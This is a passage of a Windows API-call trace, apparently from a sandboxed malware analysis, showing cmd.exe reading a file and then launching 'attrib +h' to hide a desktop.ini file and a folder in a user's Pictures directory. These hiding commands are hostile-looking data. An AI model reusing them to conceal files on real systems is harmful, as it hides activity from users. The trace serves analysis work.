lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.449] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.469] _close (_FileHandle=4) returned 0 [0145.470] FindNextFileW (in: hFindFile=0x340820, lpFindFileData=0x18f440 | out: lpFindFileData=0x18f440) returned 0 [0145.470] GetLastError () returned 0x12 [0145.470] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.471] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0145.478] _close (_FileHandle=3) returned 0 [0145.478] GetConsoleTitleW (in: lpConsoleTitle=0x18f878, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.479] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.479] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.479] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.479] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.479] GetLastError () returned 0x2 [0145.479] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.479] GetLastError () returned 0x2 [0145.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0x340820 [0145.479] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.480] GetLastError () returned 0x2 [0145.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0x340820 [0145.480] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.480] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.480] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.480] GetConsoleTitleW (in: lpConsoleTitle=0x18f60c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.480] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f494, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f55c | out: lpAttributeList=0x18f494, lpSize=0x18f55c) returned 1 [0145.480] UpdateProcThreadAttribute (in: lpAttributeList=0x18f494, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f554, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f494, lpPreviousValue=0x0) returned 1 [0145.480] GetStartupInfoW (in: lpStartupInfo=0x18f450 | out: lpStartupInfo=0x18f450*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0145.480] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0145.480] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f4f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f53c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", lpProcessInformation=0x18f53c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb4c, dwThreadId=0x990)) returned 1 [0145.482] CloseHandle (hObject=0x50) returned 1 [0145.482] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0145.482] GetEnvironmentStringsW () returned 0x342d20* [0145.482] FreeEnvironmentStringsW (penv=0x342d20) returned 1 [0145.483] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0145.557] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18f430 | out: lpExitCode=0x18f430*=0x0) returned 1 [0145.557] CloseHandle (hObject=0x4c) returned 1 [0145.557] _vsnwprintf (in: _Buffer=0x18f578, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f43c | out: _Buffer="00000000") returned 8 [0145.557] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0145.557] GetEnvironmentStringsW () returned 0x342d20* [0145.558] FreeEnvironmentStringsW (penv=0x342d20) returned 1 [0145.558] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0145.558] GetEnvironmentStringsW () returned 0x342d20* [0145.558] FreeEnvironmentStringsW (penv=0x342d20) returned 1 [0145.558] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f494 | out: lpAttributeList=0x18f494) [0145.558] GetConsoleTitleW (in: lpConsoleTitle=0x18f878, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.558] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.558] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.558] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.558] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.558] GetLastError () returned 0x2 [0145.558] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.559] GetLastError () returned 0x2 [0145.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0x340820 [0145.559] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0xffffffff [0145.559] GetLastError () returned 0x2 [0145.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18f114, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f114) returned 0x340820 [0145.559] FindClose (in: hFindFile=0x340820 | out: hFindFile=0x340820) returned 1 [0145.559] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.559] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.559] GetConsoleTitleW (in: lpConsoleTitle=0x18f60c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.559] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f494, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f55c | out: lpAttributeList=0x18f494, lpSize=0x18f55c) returned 1 [0145.559] UpdateProcThreadAttribute (in: lpAttributeList=0x18f494, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f554, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f494, lpPreviousValue=0x0) returned 1 [0145.559] GetStartupInfoW (in: lpStartupInfo=0x18f450 | out: lpStartupInfo=0x18f450*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0145.559] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0145.559] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f4f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, 